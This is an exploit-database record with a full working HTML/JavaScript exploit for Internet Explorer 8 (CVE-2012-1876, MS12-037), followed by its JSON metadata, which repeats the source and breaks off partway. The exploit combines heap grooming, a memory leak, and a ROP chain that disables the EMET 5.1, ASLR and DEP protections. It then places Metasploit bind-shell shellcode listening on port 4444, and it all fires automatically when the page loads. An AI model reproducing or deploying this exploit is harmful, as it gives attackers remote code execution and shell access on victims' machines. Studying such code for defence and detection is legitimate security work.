ID 1337DAY-ID-22895
Type zdt
Reporter ryujin
Modified 2014-11-18T00:00:00
Description
Exploit for windows platform in category remote exploits
<!--
** Internet Explorer 8 Fixed Col Span ID full ASLR, DEP and EMET 5.1 bypass
** Exploit Coded by sickness || EMET 5.1 bypass by ryujin
** http://www.offensive-security.com/vulndev/disarming-and-bypassing-emet-5-1/
** Affected Software: Internet Explorer 8
** Vulnerability: Fixed Col Span ID
** CVE: CVE-2012-1876
** Tested on Windows 7 (x86) - IE 8.0.7601.17514 & EMET 5.1
-->
<html>
<body>
<div id="evil"></div>
<table style="table-layout:fixed" ><col id="132" width="41" span="9" > </col></table>
<script language='javascript'>
// Reads two UTF-16 code units of `str` as one little-endian 32-bit value:
// unit 0 is the low half, unit 1 the high half. Used by get_leak() to turn
// leaked string contents back into a number. There is no bounds check —
// charCodeAt() past the end of the string returns NaN, so the result is then
// silently NaN rather than an error.
function strtoint(str) {
return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);
}
// Heap-grooming preamble, run at page load. Three filler strings are doubled
// up to >= 500 chars, then the loop allocates interleaved 125-unit slices
// ((0x100-6)/2 UTF-16 units, i.e. a 0x100-byte string object including
// header) into three parallel arrays plus one hidden <button> per iteration.
// Only even indices are used. The second loop nulls every other `fr` slot
// from 200 upward and forces a collection each time — presumably to leave
// freed slots of a known size adjacent to the surviving `bl` strings, which
// get_leak() reads back later; confirm against the write-up in the header.
// Note that `i` and `obj` are `var`-declared here at script scope and `i` is
// reused (undeclared) inside heapspray().
var free = "EEEE";
while ( free.length < 500 ) free += free;
var string1 = "AAAA";
while ( string1.length < 500 ) string1 += string1;
var string2 = "BBBB";
while ( string2.length < 500 ) string2 += string2;
var fr = new Array();
var al = new Array();
var bl = new Array();
var div_container = document.getElementById("evil");
// Container is hidden so the buttons never lay out/paint.
div_container.style.cssText = "display:none";
for (var i=0; i < 500; i+=2) {
fr[i] = free.substring(0, (0x100-6)/2);
al[i] = string1.substring(0, (0x100-6)/2);
bl[i] = string2.substring(0, (0x100-6)/2);
var obj = document.createElement("button");
div_container.appendChild(obj);
}
// CollectGarbage() is an IE/JScript-only global; this block is not portable.
for (var i=200; i<500; i+=2 ) {
fr[i] = null;
CollectGarbage();
}
// Builds the spray payload relative to `cbuttonlayout` (the base value that
// get_leak() derives from the leaked string) and then allocates 100 copies of
// a ~1 MB string. Every decimal offset added to `cbuttonlayout` below, and
// every absolute `%u....` constant, is hard-coded for the single build named
// in the page header (IE 8.0.7601.17514 + EMET 5.1 on Windows 7 x86); the
// same page on any other build is expected to do nothing useful or simply
// crash the tab. Style note: `rop` is re-declared with `var` dozens of times;
// in sloppy-mode JS this rebinds one function-scoped variable each time.
// The local `spray` array is never read and goes out of scope on return.
function heapspray(cbuttonlayout) {
CollectGarbage();
// Each gadget address is formatted as 8 hex digits and split into two
// 4-digit halves (low word first) so it can be embedded via unescape("%u..").
// toString(16) does not zero-pad, so a base below 0x10000000 would yield
// fewer than 8 digits and mis-split here — TODO confirm this never happens
// for the targeted build.
var rop = cbuttonlayout + 4161; // RET
var rop = rop.toString(16);
var rop1 = rop.substring(4,8);
var rop2 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 11360; // POP EBP
var rop = rop.toString(16);
var rop3 = rop.substring(4,8);
var rop4 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 111675; // XCHG EAX,ESP
var rop = rop.toString(16);
var rop5 = rop.substring(4,8);
var rop6 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 12377; // POP EBX
var rop = rop.toString(16);
var rop7 = rop.substring(4,8);
var rop8 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 642768; // POP EDX
var rop = rop.toString(16);
var rop9 = rop.substring(4,8);
var rop10 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 12201; // POP ECX --> Changed
var rop = rop.toString(16);
var rop11 = rop.substring(4,8);
var rop12 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 5504544; // Writable location
var rop = rop.toString(16);
var writable1 = rop.substring(4,8);
var writable2 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 12462; // POP EDI
var rop = rop.toString(16);
var rop13 = rop.substring(4,8);
var rop14 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 12043; // POP ESI --> changed
var rop = rop.toString(16);
var rop15 = rop.substring(4,8);
var rop16 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 63776; // JMP EAX
var rop = rop.toString(16);
var jmpeax1 = rop.substring(4,8);
var jmpeax2 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 85751; // POP EAX
var rop = rop.toString(16);
var rop17 = rop.substring(4,8);
var rop18 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 4936; // VirtualProtect()
var rop = rop.toString(16);
var vp1 = rop.substring(4,8);
var vp2 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX]
var rop = rop.toString(16);
var rop19 = rop.substring(4,8);
var rop20 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 234657; // PUSHAD
var rop = rop.toString(16);
var rop21 = rop.substring(4,8);
var rop22 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 408958; // PUSH ESP
var rop = rop.toString(16);
var rop23 = rop.substring(4,8);
var rop24 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 2228408; // POP ECX
var rop = rop.toString(16);
var rop25 = rop.substring(4,8);
var rop26 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 1586172; // POP EAX
var rop = rop.toString(16);
var rop27 = rop.substring(4,8);
var rop28 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 1589179; // MOV EAX,DWORD PTR [EAX]
var rop = rop.toString(16);
var rop29 = rop.substring(4,8);
var rop30 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 1884912; // PUSH EAX
var rop = rop.toString(16);
var rop31 = rop.substring(4,8);
var rop32 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 2140694; // ADD EAX,ECX
var rop = rop.toString(16);
var rop33 = rop.substring(4,8);
var rop34 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 2364867; // MOV DWORD PTR [EAX],ECX
var rop = rop.toString(16);
var rop35 = rop.substring(4,8);
var rop36 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 1816868; // MOV DWORD PTR DS:[ESI],EAX
var rop = rop.toString(16);
var rop37 = rop.substring(4,8);
var rop38 = rop.substring(0,4); // } RET
var getmodulew = cbuttonlayout + 4840; // GetModuleHandleW
var getmodulew = getmodulew.toString(16);
var getmodulew1 = getmodulew.substring(4,8);
var getmodulew2 = getmodulew.substring(0,4); // } RET
var rop = cbuttonlayout + 3621437; // MOV EAX,EDX
var rop = rop.toString(16);
var rop41 = rop.substring(4,8);
var rop42 = rop.substring(0,4); // } RET
// Payload string starts with 46 UTF-16 units of 0x4444 filler, then the
// chain below is appended piecewise.
var shellcode = unescape("%u4444");
while (shellcode.length < 100)
shellcode = shellcode + shellcode;
var shellcode = shellcode.substr(0, 46);
shellcode+= unescape("%u"+rop1+"%u"+rop2); // RETN
shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP # RETN
shellcode+= unescape("%u"+rop5+"%u"+rop6); // XCHG EAX,ESP # RETN
// EMET disable part 0x01 annihilate ROP protections
// Implement the Tachyon detection grid to overcome the Romulan cloaking device.
shellcode+= unescape("%u"+rop27+"%u"+rop28); // POP EAX # RETN
shellcode+= unescape("%u"+getmodulew1+"%u"+getmodulew2); // GetModuleHandleW Ptr
shellcode+= unescape("%u"+rop29+"%u"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN
shellcode+= unescape("%u"+rop31+"%u"+rop32); // PUSH EAX # RETN
shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN
shellcode+= unescape("%u5f3c%u07d2"); // EMET_STRING_PTR (GetModuleHandle argument)
shellcode+= unescape("%u7372%u0006"); // Offset to "decoding helper" 0x67372
shellcode+= unescape("%u"+rop33+"%u"+rop34); // ADD EAX,ECX # RETN (Get the address of the "decoding helper")
shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP # RETN
shellcode+= unescape("%u5e84%u07d2"); // Set EBP to successfully return from the "decoding helper"
shellcode+= unescape("%u"+rop31+"%u"+rop32); // PUSH EAX # RETN Call the "decoding helper"
shellcode+= unescape("%u0000%u0000"); // Compensate for function epilogue
shellcode+= unescape("%u0000%u0000"); // Compensate for function epilogue
shellcode+= unescape("%u0000%u0000"); // Compensate for function epilogue
shellcode+= unescape("%u0000%u0000"); // Compensate for function epilogue
shellcode+= unescape("%u"+rop41+"%u"+rop42); // MOV EAX,EDX # RETN
shellcode+= unescape("%u"+rop15+"%u"+rop16); // POP ESI # RETN
shellcode+= unescape("%u5f38%u07d2"); // MEM_ADDRESS_PTR (Store CONFIG_STRUCT here for later on)
shellcode+= unescape("%u"+rop37+"%u"+rop38); // MOV DWORD PTR DS:[ESI],EAX
shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN
shellcode+= unescape("%u01b8%u0000"); // offset to NtProtectVirtualMemory unhooked
shellcode+= unescape("%u"+rop33+"%u"+rop34); // ADD EAX,ECX # RETN (Get the address of NtProtectVirtualMemory)
shellcode+= unescape("%u"+rop29+"%u"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN
shellcode+= unescape("%u"+rop31+"%u"+rop32); // PUSH EAX # RETN
shellcode+= unescape("%u"+rop27+"%u"+rop28); // POP EAX # RETN
shellcode+= unescape("%uffff%uffff"); // ProcessHandle
shellcode+= unescape("%u5f38%u07d2"); // *BaseAddress
shellcode+= unescape("%u5f34%u07d2"); // NumberOfBytesToProtect
shellcode+= unescape("%u0040%u0000"); // NewAccessProtection
shellcode+= unescape("%u5f30%u07d2"); // OldAccessProtection
shellcode+= unescape("%u5f38%u07d2"); // Reget pointer
shellcode+= unescape("%u"+rop29+"%u"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN
shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN
shellcode+= unescape("%u0558%u0000"); // Offset to EMET mitigations switch
shellcode+= unescape("%u"+rop33+"%u"+rop34); // ADD EAX,ECX # RETN
shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN
shellcode+= unescape("%u0000%u0000"); // NULL
shellcode+= unescape("%u"+rop35+"%u"+rop36); // MOV DWORD PTR [EAX],ECX # RETN
// Performing a standard Kumeh maneuver ... (VirtualProtect mona chain)
shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP
shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP
shellcode+= unescape("%u"+rop7+"%u"+rop8); // POP EBX
shellcode+= unescape("%u1024%u0000"); // Size 0x00001024
shellcode+= unescape("%u"+rop9+"%u"+rop10); // POP EDX
shellcode+= unescape("%u0040%u0000"); // 0x00000040
shellcode+= unescape("%u"+rop11+"%u"+rop12); // POP ECX
shellcode+= unescape("%u"+writable1+"%u"+writable2); // Writable Location
shellcode+= unescape("%u"+rop13+"%u"+rop14); // POP EDI
shellcode+= unescape("%u"+rop1+"%u"+rop2); // RET
shellcode+= unescape("%u"+rop15+"%u"+rop16); // POP ESI
shellcode+= unescape("%u"+jmpeax1+"%u"+jmpeax2);// JMP EAX
shellcode+= unescape("%u"+rop17+"%u"+rop18); // POP EAX
shellcode+= unescape("%u"+vp1+"%u"+vp2); // VirtualProtect()
shellcode+= unescape("%u"+rop19+"%u"+rop20); // MOV EAX,DWORD PTR DS:[EAX]
shellcode+= unescape("%u"+rop21+"%u"+rop22); // PUSHAD
shellcode+= unescape("%u"+rop23+"%u"+rop24); // PUSH ESP
// Store various pointers here
shellcode+= unescape("%u9090%u9090"); // NOPs
shellcode+= unescape("%u9090%u18eb"); // NOPs
shellcode+= unescape("%u4242%u4242"); // OldAccessProtection
shellcode+= unescape("%u0564%u0000"); // Size for NtVirtualProtectMemory
shellcode+= unescape("%u4141%u4141"); // Store BaseAddress address on the *stack*
shellcode+= "EMET"; // EMET string
shellcode+= unescape("%u0000%u0000"); // EMET string
shellcode+= unescape("%u9090%u9090"); // NOPs
shellcode+= unescape("%u9090%u9090"); // NOPs
// Store various pointers here
// EMET disable part 0x02 annihilate EAF/EAF+ by calling NtSetContextThread
// MOV EAX,DWORD PTR DS:[076D10BCH]
// MOV EAX,DWORD PTR DS:[007D25F48H]
// MOV ESI,DWORD PTR [EAX+518H]
// SUB ESP,2CCH
// MOV DWORD PTR [ESP],10010H
// MOV EDI,ESP
// MOV ECX,2CCH
// ADD EDI,4
// SUB ECX,4
// XOR EAX,EAX
// REP STOS BYTE PTR ES:[EDI]
// PUSH ESP
// PUSH 0FFFFFFFEH
// CALL ESI
shellcode+= unescape("%u38a1%ud25f%u8b07%u18b0%u0005%u8100%uccec" +
"%u0002%uc700%u2404%u0010%u0001%ufc8b%uccb9" +
"%u0002%u8300%u04c7%ue983%u3304%uf3c0%u54aa" +
"%ufe6a%ud6ff");
shellcode+= unescape("%u9090%u9090"); // NOPs
shellcode+= unescape("%u9090%u9090"); // NOPs
// EMET disable part 0x02 end
// Bind shellcode on 4444 :)
// msf > generate -t js_le
// windows/shell_bind_tcp - 342 bytes
// http://www.metasploit.com
// VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
// EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
// I would keep the shellcode the same size for better reliability :)
shellcode+= unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b" +
"%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a" +
"%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf" +
"%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001" +
"%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18" +
"%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31" +
"%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03" +
"%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66" +
"%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489" +
"%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a" +
"%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32" +
"%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900" +
"%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050" +
"%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7" +
"%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857" +
"%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff" +
"%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789" +
"%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389" +
"%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7" +
"%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650" +
"%u5656%u5646%u564e%u5356%u6856%ucc79%u863f" +
"%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d" +
"%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff" +
"%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72" +
"%u006a%uff53%u41d5");
// Total spray should be 1000
// Pad the block to exactly 1000 UTF-16 units; if the payload ever exceeded
// 1000 units the substr length would go negative and no padding is added,
// silently breaking the fixed block size.
var padding = unescape("%u9090");
while (padding.length < 1000)
padding = padding + padding;
var padding = padding.substr(0, 1000 - shellcode.length);
shellcode+= padding;
while (shellcode.length < 100000)
shellcode = shellcode + shellcode;
// 16 chunks of 32768 units (64 KB each in UTF-16) = 1 MB, minus 19 units,
// presumably to account for string object overhead so each copy stays inside
// one allocation granule — verify against the write-up.
var onemeg = shellcode.substr(0, 64*1024/2);
// `i` is not declared here; it falls through to the script-scope `var i`.
for (i=0; i<14; i++) {
onemeg += shellcode.substr(0, 64*1024/2);
}
onemeg += shellcode.substr(0, (64*1024/2)-(38/2));
var spray = new Array();
// 100 x ~1 MB string allocations: this, together with the CollectGarbage()
// calls, is the observable heap-spray footprint of the page.
for (i=0; i<100; i++) {
spray[i] = onemeg.substr(0, onemeg.length);
}
}
// First timer stage (400 ms): re-applies the same width and more than doubles
// the span on the fixed-layout <col>. Per the header and the CVE record on this
// page, the col-span handling is the heap-overflow bug, so this is presumably
// the read-side trigger that lets get_leak() see memory past a `bl` string.
function leak(){
var leak_col = document.getElementById("132");
leak_col.width = "41";
leak_col.span = "19";
}
// Second timer stage (450 ms): reads two UTF-16 units at offset 136..137 of
// bl[498] — 11 units past the 125-unit slice allocated at load time, so the
// read only yields data if the string has been extended by the previous
// stage; otherwise strtoint() returns NaN and heapspray() is fed NaN. The
// constant 1410704 is a build-specific delta that turns the leaked value into
// the base handed to heapspray(). `hex` is dead apart from the disabled alert().
function get_leak() {
var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13));
str_addr = str_addr - 1410704;
var hex = str_addr.toString(16);
//alert(hex);
setTimeout(function(){heapspray(str_addr)}, 50);
}
// Final timer stage (700 ms): sets the <col> width to the decimal form of the
// fixed address noted inline and a larger span, presumably re-triggering the
// same overflow as a write this time. Both values are specific to the build
// in the page header.
function trigger_overflow(){
var evil_col = document.getElementById("132");
evil_col.width = "1312272"; // 0x07D25E40
evil_col.span = "44";
}
// Fixed-delay staging: leak at 400 ms, read-back at 450 ms (which itself
// schedules heapspray() 50 ms later), trigger at 700 ms. Nothing is
// synchronised with layout or GC, so the ordering depends purely on the timer
// values.
setTimeout(function(){leak()}, 400);
setTimeout(function(){get_leak()},450);
setTimeout(function(){trigger_overflow()}, 700);
</script>
</body>
</html>
{"id": "1337DAY-ID-22895", "lastseen": "2018-02-17T19:29:43", "viewCount": 182, "bulletinFamily": "exploit", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "edition": 2, "enchantments": {"score": {"value": 9.6, "vector": "NONE", "modified": "2018-02-17T19:29:43", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2012-1876"]}, {"type": "symantec", "idList": ["SMNTC-53848"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12404", "SECURITYVULNS:DOC:28204", "SECURITYVULNS:DOC:28155"]}, {"type": "exploitdb", "idList": ["EDB-ID:24017", "EDB-ID:20174", "EDB-ID:34815", "EDB-ID:33944", "EDB-ID:35273"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:119467", "PACKETSTORM:115155", "PACKETSTORM:127316", "PACKETSTORM:128476"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/BROWSER/MS12_037_IE_COLSPAN"]}, {"type": "saint", "idList": ["SAINT:E0DB2F32D06502F92B8144DCC51213D4", "SAINT:625E0D0980997F6BFF377B9847205303", "SAINT:26F60ECC90154B838B0AF4C895DDCD0E"]}, {"type": "seebug", "idList": ["SSV:74062", "SSV:87111", "SSV:87309", "SSV:60566"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:87ECAF4F1FACB468F006F877AE38824E", "EXPLOITPACK:B3A5822873FF7E264F097AB7EE9F4396", "EXPLOITPACK:8D25D01AEAA652118123781053A4BDBA", "EXPLOITPACK:022449B08C2DE005F39553B5E709DE12"]}, {"type": "canvas", "idList": ["MS12_037"]}, {"type": "zdt", "idList": ["1337DAY-ID-22396"]}, {"type": "zdi", "idList": ["ZDI-12-093"]}, {"type": "threatpost", "idList": ["THREATPOST:0EF2611E64611F9EBB9DD054ABF7473B"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310902682", "OPENVAS:902682"]}, {"type": "mskb", "idList": ["KB2699988"]}, {"type": "nessus", "idList": ["SMB_NT_MS12-037.NASL"]}], "modified": "2018-02-17T19:29:43", "rev": 2}, "vulnersScore": 9.6}, "type": "zdt", "sourceHref": "https://0day.today/exploit/22895", "description": "Exploit for windows platform in category remote exploits", "title": 
"Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.1 Bypass (MS12-037)", "cvelist": ["CVE-2012-1876"], "sourceData": "<!--\r\n** Internet Explorer 8 Fixed Col Span ID full ASLR, DEP and EMET 5.1 bypass\r\n** Exploit Coded by sickness || EMET 5.1 bypass by ryujin\r\n** http://www.offensive-security.com/vulndev/disarming-and-bypassing-emet-5-1/\r\n** Affected Software: Internet Explorer 8\r\n** Vulnerability: Fixed Col Span ID\r\n** CVE: CVE-2012-1876\r\n** Tested on Windows 7 (x86) - IE 8.0.7601.17514 & EMET 5.1\r\n-->\r\n \r\n<html>\r\n<body>\r\n<div id=\"evil\"></div>\r\n<table style=\"table-layout:fixed\" ><col id=\"132\" width=\"41\" span=\"9\" > </col></table>\r\n<script language='javascript'>\r\n \r\nfunction strtoint(str) {\r\n return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);\r\n}\r\n \r\nvar free = \"EEEE\";\r\nwhile ( free.length < 500 ) free += free;\r\n \r\nvar string1 = \"AAAA\";\r\nwhile ( string1.length < 500 ) string1 += string1;\r\n \r\nvar string2 = \"BBBB\";\r\nwhile ( string2.length < 500 ) string2 += string2;\r\n \r\nvar fr = new Array();\r\nvar al = new Array();\r\nvar bl = new Array();\r\n \r\nvar div_container = document.getElementById(\"evil\");\r\ndiv_container.style.cssText = \"display:none\";\r\n \r\nfor (var i=0; i < 500; i+=2) {\r\n fr[i] = free.substring(0, (0x100-6)/2);\r\n al[i] = string1.substring(0, (0x100-6)/2);\r\n bl[i] = string2.substring(0, (0x100-6)/2);\r\n var obj = document.createElement(\"button\");\r\n div_container.appendChild(obj);\r\n}\r\n \r\nfor (var i=200; i<500; i+=2 ) {\r\n fr[i] = null;\r\n CollectGarbage();\r\n}\r\n \r\nfunction heapspray(cbuttonlayout) {\r\n CollectGarbage();\r\n var rop = cbuttonlayout + 4161; // RET\r\n var rop = rop.toString(16);\r\n var rop1 = rop.substring(4,8);\r\n var rop2 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 11360; // POP EBP\r\n var rop = rop.toString(16);\r\n var rop3 = rop.substring(4,8);\r\n var rop4 = rop.substring(0,4); // } RET\r\n 
\r\n var rop = cbuttonlayout + 111675; // XCHG EAX,ESP\r\n var rop = rop.toString(16);\r\n var rop5 = rop.substring(4,8);\r\n var rop6 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 12377; // POP EBX\r\n var rop = rop.toString(16);\r\n var rop7 = rop.substring(4,8);\r\n var rop8 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 642768; // POP EDX\r\n var rop = rop.toString(16);\r\n var rop9 = rop.substring(4,8);\r\n var rop10 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 12201; // POP ECX --> Changed\r\n var rop = rop.toString(16);\r\n var rop11 = rop.substring(4,8);\r\n var rop12 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 5504544; // Writable location\r\n var rop = rop.toString(16);\r\n var writable1 = rop.substring(4,8);\r\n var writable2 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 12462; // POP EDI\r\n var rop = rop.toString(16);\r\n var rop13 = rop.substring(4,8);\r\n var rop14 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 12043; // POP ESI --> changed\r\n var rop = rop.toString(16);\r\n var rop15 = rop.substring(4,8);\r\n var rop16 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 63776; // JMP EAX\r\n var rop = rop.toString(16);\r\n var jmpeax1 = rop.substring(4,8);\r\n var jmpeax2 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 85751; // POP EAX\r\n var rop = rop.toString(16);\r\n var rop17 = rop.substring(4,8);\r\n var rop18 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 4936; // VirtualProtect()\r\n var rop = rop.toString(16);\r\n var vp1 = rop.substring(4,8);\r\n var vp2 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX]\r\n var rop = rop.toString(16);\r\n var rop19 = rop.substring(4,8);\r\n var rop20 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 234657; // PUSHAD\r\n var rop = rop.toString(16);\r\n var rop21 = 
rop.substring(4,8);\r\n var rop22 = rop.substring(0,4); // } RET\r\n \r\n \r\n var rop = cbuttonlayout + 408958; // PUSH ESP\r\n var rop = rop.toString(16);\r\n var rop23 = rop.substring(4,8);\r\n var rop24 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 2228408; // POP ECX\r\n var rop = rop.toString(16);\r\n var rop25 = rop.substring(4,8);\r\n var rop26 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 1586172; // POP EAX\r\n var rop = rop.toString(16);\r\n var rop27 = rop.substring(4,8);\r\n var rop28 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 1589179; // MOV EAX,DWORD PTR [EAX]\r\n var rop = rop.toString(16);\r\n var rop29 = rop.substring(4,8);\r\n var rop30 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 1884912; // PUSH EAX\r\n var rop = rop.toString(16);\r\n var rop31 = rop.substring(4,8);\r\n var rop32 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 2140694; // ADD EAX,ECX\r\n var rop = rop.toString(16);\r\n var rop33 = rop.substring(4,8);\r\n var rop34 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 2364867; // MOV DWORD PTR [EAX],ECX\r\n var rop = rop.toString(16);\r\n var rop35 = rop.substring(4,8);\r\n var rop36 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 1816868; // MOV DWORD PTR DS:[ESI],EAX\r\n var rop = rop.toString(16);\r\n var rop37 = rop.substring(4,8);\r\n var rop38 = rop.substring(0,4); // } RET\r\n \r\n var getmodulew = cbuttonlayout + 4840; // GetModuleHandleW\r\n var getmodulew = getmodulew.toString(16);\r\n var getmodulew1 = getmodulew.substring(4,8);\r\n var getmodulew2 = getmodulew.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 3621437; // MOV EAX,EDX\r\n var rop = rop.toString(16);\r\n var rop41 = rop.substring(4,8);\r\n var rop42 = rop.substring(0,4); // } RET\r\n \r\n var shellcode = unescape(\"%u4444\");\r\n while (shellcode.length < 100)\r\n shellcode = shellcode + shellcode;\r\n var 
shellcode = shellcode.substr(0, 46);\r\n \r\n shellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RETN\r\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP # RETN\r\n shellcode+= unescape(\"%u\"+rop5+\"%u\"+rop6); // XCHG EAX,ESP # RETN\r\n \r\n // EMET disable part 0x01 annihilate ROP protections\r\n // Implement the Tachyon detection grid to overcome the Romulan cloaking device.\r\n shellcode+= unescape(\"%u\"+rop27+\"%u\"+rop28); // POP EAX # RETN\r\n shellcode+= unescape(\"%u\"+getmodulew1+\"%u\"+getmodulew2); // GetModuleHandleW Ptr\r\n shellcode+= unescape(\"%u\"+rop29+\"%u\"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN\r\n shellcode+= unescape(\"%u\"+rop31+\"%u\"+rop32); // PUSH EAX # RETN\r\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\r\n shellcode+= unescape(\"%u5f3c%u07d2\"); // EMET_STRING_PTR (GetModuleHandle argument)\r\n shellcode+= unescape(\"%u7372%u0006\"); // Offset to \"decoding helper\" 0x67372\r\n shellcode+= unescape(\"%u\"+rop33+\"%u\"+rop34); // ADD EAX,ECX # RETN (Get the address of the \"decoding helper\")\r\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP # RETN\r\n shellcode+= unescape(\"%u5e84%u07d2\"); // Set EBP to successfully return from the \"decoding helper\"\r\n shellcode+= unescape(\"%u\"+rop31+\"%u\"+rop32); // PUSH EAX # RETN Call the \"decoding helper\"\r\n shellcode+= unescape(\"%u0000%u0000\"); // Compensate for function epilogue\r\n shellcode+= unescape(\"%u0000%u0000\"); // Compensate for function epilogue\r\n shellcode+= unescape(\"%u0000%u0000\"); // Compensate for function epilogue\r\n shellcode+= unescape(\"%u0000%u0000\"); // Compensate for function epilogue\r\n shellcode+= unescape(\"%u\"+rop41+\"%u\"+rop42); // MOV EAX,EDX # RETN\r\n shellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI # RETN\r\n shellcode+= unescape(\"%u5f38%u07d2\"); // MEM_ADDRESS_PTR (Store CONFIG_STRUCT here for later on)\r\n shellcode+= unescape(\"%u\"+rop37+\"%u\"+rop38); // MOV DWORD PTR 
